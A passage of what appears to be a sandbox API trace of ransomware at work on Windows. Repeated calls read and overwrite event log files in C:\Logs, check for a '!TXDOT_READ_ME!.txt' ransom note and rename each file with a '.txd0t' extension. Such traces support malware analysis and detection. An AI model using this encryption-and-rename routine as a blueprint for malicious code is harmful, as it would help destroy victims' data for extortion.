lpNewFilePointer=0xffffffff) returned 1 [0089.458] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0089.459] FlushFileBuffers (hFile=0x474) returned 1 [0089.461] GetProcessHeap () returned 0xe30000 [0089.461] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1d98 [0089.461] StrCpyW (in: psz1=0xed1d98, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" [0089.462] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned="Microsoft-Windows-TWinUI%4Operational.evtx" [0089.462] StrCpyW (in: psz1=0xed1db0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.462] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.462] GetProcessHeap () returned 0xe30000 [0089.462] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1d98 | out: hHeap=0xe30000) returned 1 [0089.462] CloseHandle (hObject=0x474) returned 1 [0089.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.txd0t")) returned 1 [0089.462] SetEvent (hEvent=0x3f8) returned 1 [0089.462] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.463] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" [0089.463] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t" [0089.464] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t") returned 0 [0089.464] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.464] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.464] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.464] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.464] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.465] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.465] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x11000, lpOverlapped=0x0) returned 1 [0089.467] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.468] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x11000, lpOverlapped=0x0) returned 1 [0089.468] FlushFileBuffers (hFile=0x474) returned 1 [0089.472] GetProcessHeap () returned 0xe30000 [0089.472] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x130) returned 0xed7f88 [0089.472] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" [0089.472] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned="Microsoft-Windows-User Profile Service%4Operational.evtx" [0089.472] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.472] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.472] GetProcessHeap () returned 0xe30000 [0089.472] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.472] CloseHandle (hObject=0x474) returned 1 [0089.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.txd0t")) returned 1 [0089.473] SetEvent (hEvent=0x3f8) returned 1 [0089.473] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.474] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" [0089.474] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t" [0089.474] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t") returned 0 [0089.474] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", dwFileAttributes=0x80) returned 1 [0089.474] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.474] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.475] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.475] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.475] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.476] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0089.482] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.483] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0089.483] FlushFileBuffers (hFile=0x474) returned 1 [0089.488] GetProcessHeap () returned 0xe30000 [0089.488] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x118) returned 0xed1fe8 [0089.488] StrCpyW (in: psz1=0xed1fe8, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" [0089.488] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned="Microsoft-Windows-UserPnp%4ActionCenter.evtx" [0089.488] StrCpyW (in: psz1=0xed2000, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.488] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.488] GetProcessHeap () returned 0xe30000 [0089.488] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1fe8 | out: hHeap=0xe30000) returned 1 [0089.488] CloseHandle (hObject=0x474) returned 1 [0089.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.txd0t")) returned 1 [0089.489] SetEvent (hEvent=0x3f8) returned 1 [0089.489] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.492] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" [0089.492] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t" [0089.492] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t") returned 0 [0089.492] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", dwFileAttributes=0x80) returned 1 [0089.492] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.492] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.492] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.492] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.493] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.493] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0089.498] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.498] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0089.499] FlushFileBuffers (hFile=0x460) returned 1 [0089.511] GetProcessHeap () returned 0xe30000 [0089.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11a) returned 0xed7f88 [0089.511] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" [0089.511] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned="Microsoft-Windows-UserPnp%4DeviceInstall.evtx" [0089.511] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.511] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.511] GetProcessHeap () returned 0xe30000 [0089.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.511] CloseHandle (hObject=0x460) returned 1 [0089.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.txd0t")) returned 1 [0089.512] SetEvent (hEvent=0x3f8) returned 1 [0089.512] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.515] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" [0089.515] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t" [0089.515] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t") returned 0 [0089.515] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.516] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.516] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.516] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.516] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.518] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.518] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x11000, lpOverlapped=0x0) returned 1 [0089.524] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.524] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x11000, lpOverlapped=0x0) returned 1 [0089.524] FlushFileBuffers (hFile=0x460) returned 1 [0089.533] GetProcessHeap () returned 0xe30000 [0089.533] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x128) returned 0xed7f88 [0089.533] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" [0089.533] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned="Microsoft-Windows-Windows Defender%4Operational.evtx" [0089.533] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.533] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.533] GetProcessHeap () returned 0xe30000 [0089.533] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.533] CloseHandle (hObject=0x460) returned 1 [0089.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.txd0t")) returned 1 [0089.534] SetEvent (hEvent=0x3f8) returned 1 [0089.534] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.537] StrCpyW (in: psz1=0x37ff420, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" [0089.537] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t" [0089.537] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t") returned 0 [0089.537] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", dwFileAttributes=0x80) returned 1 [0089.537] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.538] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.538] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.538] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.539] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.539] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff3e0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3e0*=0x11000, lpOverlapped=0x0) returned 1 [0089.542] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.542] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff3e4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3e4*=0x11000, lpOverlapped=0x0) returned 1 [0089.542] FlushFileBuffers (hFile=0x464) returned 1 [0089.608] GetProcessHeap () returned 0xe30000 [0089.608] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x164) returned 0xed4530 [0089.608] StrCpyW (in: psz1=0xed4530, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" [0089.608] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" [0089.608] StrCpyW (in: psz1=0xed4548, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.608] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.608] GetProcessHeap () returned 0xe30000 [0089.608] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0089.608] CloseHandle (hObject=0x464) returned 1 [0089.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.txd0t")) returned 1 [0089.609] SetEvent (hEvent=0x3f8) returned 1 [0089.609] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.611] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" [0089.611] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t" [0089.611] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t") returned 0 [0089.612] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", dwFileAttributes=0x80) returned 1 [0089.612] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.612] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.612] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.612] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.613] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.613] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x11000, lpOverlapped=0x0) returned 1 [0089.618] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.618] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, 